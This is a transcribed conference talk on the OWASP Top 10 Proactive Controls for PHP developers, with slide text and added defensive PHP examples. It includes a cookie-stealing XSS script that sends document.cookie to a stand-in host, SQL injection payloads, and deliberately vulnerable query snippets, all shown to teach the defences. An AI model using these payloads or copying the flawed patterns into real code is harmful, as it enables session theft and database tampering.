OWASP Top 10 Proactive Controls
Katy Anton @katyanton, October 2016
PHPNW16
OWASP Top 10 Risks - 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross Site Scripting ( XSS )
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
Katy Anton
• Software development background
• Certified Secure Software Lifecycle Professional (CSSLP)
• Application Security Consultant @Veracode
• OWASP Bristol Chapter Leader
• Project Co-Leader for OWASP Top 10 Proactive Controls
@katyanton
https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016
• Symfony implementation
• Disclosure of information
• SQL Injection
New Website
OWASP Application Security Verification Standard (ASVS)
C1. Verify for Security Early and Often
• Choose the level of security for your application
• Security requirements and tests - OWASP ASVS
• Verify for security early and often (OWASP ZAP in continuous integration)
Proactive Control: C1. Verify for security early and often
Risks prevented: All OWASP Top 10 risks!
SQL injection example

```php
$email = "'; -- @owasp.org";
$sql = "UPDATE user SET email='$email' WHERE id='1'";
```

Becomes

```sql
UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
```

Everything after `--` is a SQL comment, so the WHERE clause is no longer part of the statement and the update is not restricted to the user with id 1.
C2. Parameterize Queries
Parameterized queries prevent untrusted input from being interpreted as part of a SQL command: the SQL text is fixed when the statement is prepared, and the input is only ever bound as a value.
C2. Control: Data Access Layer
Example of query parametrisation - how NOT to do it!

```php
<?php
// Calling prepare() is not enough: the request value is interpolated into the
// SQL text before the database sees it, so nothing is actually parameterized.
$stmt = $dbh->prepare("UPDATE users SET email = {$_GET['email']} WHERE id = $id");
$stmt->execute();
```

C2: How NOT to

```php
$sql = "UPDATE users SET email = {$_GET['email']} WHERE id = $id";
```

This one string combines both the code and the input. The SQL parser cannot differentiate between code and user input.
C2. Control: Data Access Layer
PHP: Query Parametrization - Correct Usage

```php
<?php
// $email and $id hold the request values; the query text contains only
// placeholders, and the values are bound separately so they are never parsed as SQL.
$stmt = $dbh->prepare("UPDATE users SET email = :new_email WHERE id = :user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();
```
Proactive Control: C2. Parameterize Queries
Risks prevented: A1. Injection
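To show the difference between the two C2 snippets on real data, the following added example (not from the slides) runs the email payload from the SQL injection slide against an in-memory SQLite database, once with string interpolation and once with a PDO prepared statement. The users table, its rows and the function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): the slide's email payload run against
// an in-memory SQLite database, first with string interpolation and then with
// a PDO prepared statement. The users table and its rows are constructed here.
declare(strict_types=1);

function freshDb(): PDO
{
    $dbh = new PDO('sqlite::memory:');
    $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $dbh->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL)');
    $dbh->exec("INSERT INTO users (id, email) VALUES (1, 'alice@example.com'), (2, 'bob@example.com')");
    return $dbh;
}

// How NOT to do it: the input is spliced into the SQL text, so the parser
// cannot tell where the command ends and the data begins.
function updateEmailUnsafe(PDO $dbh, int $id, string $email): void
{
    $dbh->exec("UPDATE users SET email='$email' WHERE id='$id'");
}

// Correct usage: the query shape is fixed at prepare() time; the input is
// bound as a value and is never parsed as SQL, whatever characters it holds.
function updateEmailSafe(PDO $dbh, int $id, string $email): void
{
    $stmt = $dbh->prepare('UPDATE users SET email = :new_email WHERE id = :user_id');
    $stmt->bindValue(':new_email', $email, PDO::PARAM_STR);
    $stmt->bindValue(':user_id', $id, PDO::PARAM_INT);
    $stmt->execute();
}

/** id => email for every row. */
function emails(PDO $dbh): array
{
    return $dbh->query('SELECT id, email FROM users ORDER BY id')->fetchAll(PDO::FETCH_KEY_PAIR);
}

$payload = "'; -- @owasp.org";      // the slide's payload, reproduced for the demo

$dbh = freshDb();
updateEmailUnsafe($dbh, 1, $payload);
print_r(emails($dbh));
// [1 => '', 2 => '']: the WHERE clause became a comment, so every row was updated.

$dbh = freshDb();
updateEmailSafe($dbh, 1, $payload);
print_r(emails($dbh));
// [1 => "'; -- @owasp.org", 2 => 'bob@example.com']: only row 1 changed, and
// the payload was stored as plain text.
```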
XSS example

```html
<script type="text/javascript">
var adr = 'http://evilwebsite.com/send.php?cakemonster=' + escape(document.cookie);
var img = new Image();
img.src = adr;
</script>
```
C3. Encode Your Output
C3: Controls - Contextual Encoding
• Symfony 2+: Twig
• ZF2: ZendEscaper
Proactive Control: C3. Encode Output
Risks prevented: A1. Injection; A3. XSS
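Contextual encoding means choosing the encoder by where the output lands. The following added example (not from the slides, and using PHP's own functions rather than Twig or ZendEscaper) renders the script from the XSS slide, treated as an untrusted comment, into an HTML body, an attribute, a script block and a URL parameter; the function names are assumptions.

```php
<?php
// Added example (not from the slides): output encoding chosen per context,
// using PHP's own functions instead of Twig or ZendEscaper. The input is the
// slide's cookie-stealing script, constructed here as an untrusted comment.
declare(strict_types=1);

// HTML body text and attribute values: escape &, <, >, " and '.
function encodeHtml(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Inside a <script> block: JSON-encode with the HTML-sensitive characters hex
// escaped, so data containing "</script>" cannot close the script block.
function encodeJs(string $untrusted): string
{
    return json_encode(
        $untrusted,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// A value placed inside a URL query string.
function encodeUrlParam(string $untrusted): string
{
    return rawurlencode($untrusted);
}

$comment = '<script>var img = new Image(); img.src = "http://evilwebsite.com/send.php?cakemonster=" + escape(document.cookie);</script>';

// In each context the comment stays text; the browser never parses it as a tag.
$html = '<p>' . encodeHtml($comment) . '</p>';
$attr = '<input value="' . encodeHtml($comment) . '">';
$js   = '<script>var lastComment = ' . encodeJs($comment) . ';</script>';
$url  = '<a href="/search?q=' . encodeUrlParam($comment) . '">search</a>';

foreach ([$html, $attr, $js, $url] as $fragment) {
    echo $fragment, PHP_EOL;
}
// In $js the page contains a JSON string literal (\u003Cscript\u003E...), so no
// literal "<script>" ever appears where the HTML parser would act on it.
```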
C4. Validate All Input
C4: Examples of input to validate
• GET / POST data (including hidden fields)
• File uploads
• HTTP headers
• Cookies
• Database
C4: Controls
PHP filter extension, available as standard since v5.2.
Example of both validation and sanitisation:

```php
<?php
$sanitised_url = filter_var($url, FILTER_SANITIZE_URL);
if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) {
    echo "This is a valid URL.";
}
```
Input Validation Prevents 2nd Order SQL Injection
Register form (fields: Username, Password)
• Two users register: "john" and "john'--"
• The username value "john'--" is accepted and stored; later it becomes the SQL injection payload
2nd Order SQL Injection Example
Change password form (fields: Current Password, New Password, New Password), logged in as john'--

```sql
UPDATE users SET password='123' WHERE username='john'--' and password='abc'
```

Becomes

```sql
UPDATE users SET password='123' WHERE username='john'
```

The stored username closes the quote and comments out the current-password check, so the password of the real user john is changed without knowing it.
Proactive Control: C4. Validate All Input
Risks prevented: A1. Injection; A3. XSS; A10. Unvalidated redirects & forwards
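The filter extension from the C4 controls slide can validate a whole form at once. The following added example (not from the slides) defines an allow-list rule per field of the register form; the username rule rejects the "john'--" value from the second-order slides before it can be stored. Field names, the regular expression and the sample submissions are constructed for the demo.

```php
<?php
// Added example (not from the slides): allow-list validation of the register
// form with the filter extension. The username rule rejects the slide's
// "john'--" value before it can be stored and reused in a later query.
// Field names and the sample submissions are constructed for the demo.
declare(strict_types=1);

// One definition for the whole form: every field has a filter, and fields not
// in the definition are dropped because filter_var_array only returns these keys.
const REGISTER_FORM = [
    'username' => [
        'filter'  => FILTER_VALIDATE_REGEXP,
        'options' => ['regexp' => '/^[a-z0-9_]{3,20}$/'],   // allow-list, not a deny-list of quotes
    ],
    'email'    => FILTER_VALIDATE_EMAIL,
    'homepage' => FILTER_VALIDATE_URL,
];

/**
 * Returns ['ok' => true, 'data' => ...] with the validated fields, or
 * ['ok' => false, 'errors' => [...]] naming every field that failed.
 * A missing field (null) or a rejected one (false) is a failure, never a default.
 */
function validateRegistration(array $post): array
{
    $result = filter_var_array($post, REGISTER_FORM, true);
    $errors = [];
    foreach (array_keys(REGISTER_FORM) as $field) {
        $value = $result[$field] ?? null;
        if ($value === false || $value === null) {
            $errors[] = $field;
        }
    }
    return $errors === []
        ? ['ok' => true, 'data' => $result]
        : ['ok' => false, 'errors' => $errors];
}

// Constructed submissions.
$good = ['username' => 'john', 'email' => 'john@example.com', 'homepage' => 'https://example.com/'];
$bad  = ['username' => "john'--", 'email' => 'not-an-email', 'homepage' => 'example dot com'];

var_export(validateRegistration($good));   // ok => true, data holds the three fields
echo PHP_EOL;
var_export(validateRegistration($bad));    // ok => false, errors => username, email, homepage
echo PHP_EOL;
// Because "john'--" never reaches the database, the second-order payload is never
// stored; the parameterized UPDATE from C2 remains the second layer in case a
// stored value is ever reused in SQL.
```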
New Website
• C1 Verify for Security Early and Often
• C2 Parametrize Queries
• C3 Encode Data
• C4 Validate Input
C5. Implement Identity and Authentication Control
C5: Best practices
• Secure password storage
• Multi-factor authentication
• Secure password recovery mechanism
• Transmit sensitive data only over TLS (v1.2)
• Error messages
• Prevent brute-force attacks
C5. PHP Password storage
• password_hash("my_password", PASSWORD_DEFAULT)
• since PHP v5.5
• compatibility library for versions < 5.5
C5. Password storage - How Not To

```text
$password = bcrypt([salt] + [password], work_factor);
$loginkey = md5(lc([username]) . "::" . lc([password]))
```

Be consistent when storing sensitive data! The bcrypt hash is undermined by the second value: an unsalted md5 of the lower-cased password is far cheaper to crack, so the weakest derivation sets the real level of protection.
C5. Forgot Password
Forgot password design:
1) Ask one or more security questions
2) Send the user a randomly generated token
3) Verify the token in the same web session
4) Change the password
Resources: https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
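Steps 2 to 4 of this design, as an added example that is not from the slides: the token comes from the CSPRNG, is stored only as a hash, is bound to the session that requested it, expires, and can be used once. The in-memory stores, the time values and the function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): the token steps (2 to 4) of the
// forgot-password design above. The token comes from the CSPRNG, is stored only
// as a hash, is bound to the session that asked for it, expires, and works once.
// The in-memory $resets store and the timestamps are constructed for the demo.
declare(strict_types=1);

const TOKEN_TTL_SECONDS = 15 * 60;

/** Step 2: create a token; the raw value is returned to be sent to the user. */
function issueResetToken(array &$resets, string $username, string $sessionId, int $now): string
{
    $token = bin2hex(random_bytes(32));              // 256 bits of entropy
    $resets[$username] = [
        'hash'    => hash('sha256', $token),         // a leaked table does not leak usable tokens
        'session' => $sessionId,                     // step 3: must be verified in the same session
        'expires' => $now + TOKEN_TTL_SECONDS,
    ];
    return $token;
}

/** Step 3: true exactly once for a matching, unexpired token from the same session. */
function verifyResetToken(array &$resets, string $username, string $token, string $sessionId, int $now): bool
{
    $entry = $resets[$username] ?? null;
    if ($entry === null) {
        return false;
    }
    $ok = hash_equals($entry['hash'], hash('sha256', $token))   // constant-time comparison
        && hash_equals($entry['session'], $sessionId)
        && $now < $entry['expires'];
    if ($ok) {
        unset($resets[$username]);                   // single use
    }
    // On failure the token is kept (a guess must not cancel the real one);
    // rate-limit attempts per account instead.
    return $ok;
}

/** Step 4: runs only after step 3 succeeded; storage as on the C5 storage slide. */
function changePassword(array &$users, string $username, string $newPassword): void
{
    $users[$username] = password_hash($newPassword, PASSWORD_DEFAULT);
}

$resets = [];
$users  = ['john' => password_hash('old password', PASSWORD_DEFAULT)];
$t = 1_700_000_000;                                  // constructed "current time"

$token = issueResetToken($resets, 'john', 'sess-A', $t);
var_dump(verifyResetToken($resets, 'john', $token, 'sess-B', $t + 60));    // false: other session
var_dump(verifyResetToken($resets, 'john', $token, 'sess-A', $t + 3600));  // false: expired
$token = issueResetToken($resets, 'john', 'sess-A', $t);
if (verifyResetToken($resets, 'john', $token, 'sess-A', $t + 60)) {       // true
    changePassword($users, 'john', 'new password');
}
var_dump(verifyResetToken($resets, 'john', $token, 'sess-A', $t + 61));    // false: already used
var_dump(password_verify('new password', $users['john']));                 // true
```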
C5. Error messages
How not to do it! One error message for a valid user and a different one for a not-registered user.
Error messages must be identical in both the HTTP response and the HTML shown to the user.
Proactive Control: C5. Establish Identity and Authentication Controls
Risks prevented: A2. Broken Authentication and Session Management
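The storage and error-message slides above fit together in one login path. The following added example (not from the slides) stores passwords with password_hash(), upgrades the cost transparently with password_needs_rehash(), and returns the same message while doing the same amount of work whether or not the username exists. The in-memory user table, the cost value and the function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): password_hash()/password_verify() for
// storage, password_needs_rehash() to raise the cost later, and a login that
// returns the same message and does the same work whether the user exists or
// not. The in-memory user table and the messages are constructed for the demo.
declare(strict_types=1);

const HASH_ALGO    = PASSWORD_DEFAULT;   // bcrypt today; PHP may move to a stronger default later
const HASH_OPTIONS = ['cost' => 12];     // tune so that one hash takes roughly 100 ms on your hardware
const LOGIN_FAILED = 'Invalid username or password.';

// Computed once; verifying against it keeps the "unknown user" path as slow as
// the "wrong password" path, so response time does not reveal which usernames exist.
function dummyHash(): string
{
    static $hash = null;
    return $hash ??= password_hash('dummy-password-for-timing', HASH_ALGO, HASH_OPTIONS);
}

function register(array &$users, string $username, string $password): void
{
    $users[$username] = password_hash($password, HASH_ALGO, HASH_OPTIONS);
}

/** Returns ['ok' => bool, 'message' => string]; the failure message never differs. */
function login(array &$users, string $username, string $password): array
{
    $stored = $users[$username] ?? dummyHash();
    $valid  = password_verify($password, $stored) && isset($users[$username]);
    if (!$valid) {
        return ['ok' => false, 'message' => LOGIN_FAILED];
    }
    // Transparent upgrade: if the cost (or algorithm) changed, rehash on a successful login.
    if (password_needs_rehash($stored, HASH_ALGO, HASH_OPTIONS)) {
        $users[$username] = password_hash($password, HASH_ALGO, HASH_OPTIONS);
    }
    return ['ok' => true, 'message' => 'Welcome, ' . $username];
}

$users = [];
register($users, 'john', 'correct horse battery staple');

var_dump(login($users, 'john', 'correct horse battery staple')['ok']);  // bool(true)
echo login($users, 'john', 'wrong')['message'], PHP_EOL;                   // Invalid username or password.
echo login($users, 'nobody', 'wrong')['message'], PHP_EOL;                 // identical text
// The stored hash embeds algorithm, cost and salt ("$2y$12$..."), so there is no
// separate salt column and no second, weaker derivation of the password.
```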
C6. Implement Appropriate Access Controls
C6: Best Practices
• Deny by default
• Least privilege
• Force all requests to go through access control checks
• Check on the server when each function is accessed
C6: Role vs Resource based ACLs
Resource based:

```java
if (user.isPermitted("project:view:123")) {
    // show the project report button
} else {
    // don't show the button
}
```

Role based:

```java
if (user.hasRole("Project Manager")) {
    // show the project report button
} else {
    // don't show the button
}
```

Once a second role also needs the button, every role-based check has to be edited:

```java
if (user.hasRole("Project Manager") || user.hasRole("Admin")) {
    // show the project report button
} else {
    // don't show the button
}
```
Proactive Control: C6. Implement Appropriate Access Controls
Risks prevented: A4. Insecure Direct Object References; A7. Missing Function Level Access Control
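The snippets above decide whether to show a button; the check that matters is the one on the server. The following added example (not from the slides) implements a resource-based isPermitted() in the style of the slide's "project:view:123" strings, deny by default, and applies it to every request for a project report. The grant syntax, the User class and the in-memory users are constructed for the demo.

```php
<?php
// Added example (not from the slides): a resource-based permission check in the
// style of the slide's user.isPermitted("project:view:123"), deny by default,
// performed on the server for every request rather than only when drawing the
// button. The grant strings and in-memory users are constructed for the demo.
declare(strict_types=1);

final class User
{
    /** @param string[] $grants e.g. "project:view:123"; "*" matches any part */
    public function __construct(private array $grants) {}

    /** Deny by default: true only if some grant covers every part of $permission. */
    public function isPermitted(string $permission): bool
    {
        $wanted = explode(':', $permission);
        foreach ($this->grants as $grant) {
            $have = explode(':', $grant);
            if (count($have) !== count($wanted)) {
                continue;
            }
            $covers = true;
            foreach ($wanted as $i => $part) {
                if ($have[$i] !== '*' && $have[$i] !== $part) {
                    $covers = false;
                    break;
                }
            }
            if ($covers) {
                return true;
            }
        }
        return false;
    }
}

/** Server-side handler for GET /projects/{id}/report: every request passes this check. */
function projectReport(User $user, int $projectId): array
{
    if (!$user->isPermitted("project:view:$projectId")) {
        // Same response whether or not the project exists: changing the ID in
        // the URL (A4) reveals nothing.
        return ['status' => 403, 'body' => 'Forbidden'];
    }
    return ['status' => 200, 'body' => "Report for project $projectId"];
}

$pm    = new User(['project:view:123', 'project:edit:123']);
$admin = new User(['project:*:*']);
$guest = new User([]);

var_dump(projectReport($pm, 123)['status']);     // int(200)
var_dump(projectReport($pm, 124)['status']);     // int(403): not this user's project
var_dump(projectReport($admin, 124)['status']);  // int(200)
var_dump(projectReport($guest, 123)['status']);  // int(403): no grants at all
// Hiding the button in the UI (the slide's snippet) is cosmetic; projectReport()
// is the control that counts, because a direct request bypasses the UI (A7).
```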
C7. Protect Data
C7 Controls: Data in transit
Data in transit: HTTPS
• Confidentiality: a spy cannot view your data
• Integrity: a spy cannot change your data
• Authenticity: the server you visit is the right one
MITM protection - HSTS
• HTTPS + Strict-Transport-Security header
C7 Controls: Data at rest
1. Algorithm: AES (Advanced Encryption Standard)
2. Secure key management
3. Adequate access controls and auditing
Proactive Control: C7. Protect Data
Risks prevented: A6. Sensitive Data Exposure
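Both halves of C7 in PHP, as an added example that is not from the slides: in transit, redirect plain HTTP to HTTPS and send the Strict-Transport-Security header; at rest, AES-256-GCM through openssl with the key read from an environment variable (APP_DATA_KEY is an assumed name) so that key management stays outside the code. The sample record, the demo key and the function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): the two C7 controls in PHP. Data in
// transit: redirect plain HTTP to HTTPS and send Strict-Transport-Security.
// Data at rest: AES-256-GCM through openssl, with the key read from an
// environment variable (assumed name APP_DATA_KEY) rather than from the code.
// The sample record and the demo key are constructed here.
declare(strict_types=1);

/** Returns the headers to send for this request ($server is the $_SERVER array). */
function transportHeaders(array $server): array
{
    $isHttps = !empty($server['HTTPS']) && $server['HTTPS'] !== 'off';
    if (!$isHttps) {
        return ['Location: https://' . $server['HTTP_HOST'] . $server['REQUEST_URI']];
    }
    // One year, including subdomains: the browser refuses plain HTTP afterwards.
    return ['Strict-Transport-Security: max-age=31536000; includeSubDomains'];
}

/** Key management stays outside the application: 32 bytes, hex-encoded, from the environment. */
function dataKey(): string
{
    $hex = (string) getenv('APP_DATA_KEY');
    if (strlen($hex) !== 64 || !ctype_xdigit($hex)) {
        throw new RuntimeException('APP_DATA_KEY must be 32 bytes, hex-encoded');
    }
    return hex2bin($hex);
}

/** Returns base64(iv . tag . ciphertext); a fresh 96-bit IV for every record. */
function encryptField(string $plaintext, string $key): string
{
    $iv  = random_bytes(12);
    $tag = '';
    $ct  = openssl_encrypt($plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    return base64_encode($iv . $tag . $ct);
}

function decryptField(string $stored, string $key): string
{
    $raw = base64_decode($stored, true);
    if ($raw === false || strlen($raw) < 28) {
        throw new RuntimeException('malformed record');
    }
    [$iv, $tag, $ct] = [substr($raw, 0, 12), substr($raw, 12, 16), substr($raw, 28)];
    $pt = openssl_decrypt($ct, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($pt === false) {
        // GCM's tag check fails on a wrong key or on any modified byte.
        throw new RuntimeException('decryption failed: wrong key or tampered data');
    }
    return $pt;
}

// Demo only: a throw-away key placed in the environment; never put one in source.
putenv('APP_DATA_KEY=' . bin2hex(random_bytes(32)));
$key    = dataKey();
$stored = encryptField('4111 1111 1111 1111', $key);
echo decryptField($stored, $key), PHP_EOL;                  // 4111 1111 1111 1111

$raw = base64_decode($stored);
$raw[30] = chr(ord($raw[30]) ^ 0x01);                       // flip one bit of the ciphertext
try {
    decryptField(base64_encode($raw), $key);
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL;                         // decryption failed: ...
}
print_r(transportHeaders(['HTTPS' => 'on', 'HTTP_HOST' => 'example.com', 'REQUEST_URI' => '/']));
```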
New Website
• C1 Verify for Security Early and Often
• C2 Parametrize Queries
• C3 Encode Data
• C4 Validate Input
• C5 Authentication
• C6 Access Controls
• C7 Protect Data
C8. Implement Logging and Intrusion Detection
Proactive Control: C8. Logging and Intrusion Detection
Risks prevented: All OWASP Top 10 risks!
C9. Leverage Security Frameworks and Libraries
C9: Examples
• Framework with CSRF protection
• Framework with XSS protection
• ORM - SQL injection prevention
• Vetted cryptographic algorithm
C9: Best Practices
• Use trusted sources
• Low coupling (low coupling == reduced attack surface)
• Update regularly / replace
Proactive Control: C9. Leverage Security Frameworks and Libraries
Risks prevented: All OWASP Top 10 risks!
C10. Error and Exception Handling
C10: Best Practices
• Centralised error handling
• Verbose enough to explain the issue
• Don't leak critical information
Proactive Control: C10. Error and Exception Handling
Risks prevented: All OWASP Top 10 risks!
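The three C10 practices in one handler, as an added example that is not from the slides: the full exception goes to the log under a reference ID, and the user receives only a generic message plus that ID. The in-memory log buffer, the failing query and the function names are constructed for the demo.

```php
<?php
// Added example (not from the slides): one central exception handler. The full
// exception (class, message, file, line, trace) goes to the log with a
// reference ID; the user sees only a generic message and that ID. The log
// destination is a constructed in-memory buffer for the demo.
declare(strict_types=1);

$logBuffer = [];

/** Returns [HTTP status, body shown to the user]; logs the detail separately. */
function handleException(Throwable $e, array &$log): array
{
    $ref = bin2hex(random_bytes(8));             // correlates the user's report with the log line
    // Verbose enough for the developer: everything needed to reproduce the issue.
    $log[] = sprintf('[%s] ref=%s %s: %s at %s:%d%s%s',
        date('c'), $ref, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine(),
        PHP_EOL, $e->getTraceAsString());
    // Nothing critical for the user: no paths, SQL, stack frames or class names.
    $body = "Something went wrong. Please quote reference $ref when reporting this.";
    return [500, $body];
}

function lookupUser(PDO $dbh, string $id): array
{
    $stmt = $dbh->prepare('SELECT id, email FROM users WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        throw new DomainException("no user with id $id");
    }
    return $row;
}

// Simulate a request whose query fails: the users table does not exist.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
try {
    lookupUser($dbh, '1');
} catch (Throwable $e) {
    [$status, $body] = handleException($e, $logBuffer);
    echo "HTTP $status", PHP_EOL, $body, PHP_EOL;   // generic text plus the reference ID
}
echo '--- log ---', PHP_EOL, $logBuffer[0], PHP_EOL; // the PDOException detail stays server side

// In a real application register the handler once, with display_errors off, so
// that uncaught errors never reach PHP's default output:
// ini_set('display_errors', '0');
// set_exception_handler(function (Throwable $e) { /* log, then emit the generic body */ });
```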
New Website
• C1 Verify for Security Early and Often
• C2 Parametrize Queries
• C3 Encode Data
• C4 Validate Input
• C5 Authentication
• C6 Access Controls
• C7 Protect Data
• C8 Logging
• C9 Leverage Security
• C10 Error Handling
It's a Start To Secure Software by Default!
Reference
OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP_Proactive_Controls
Thank you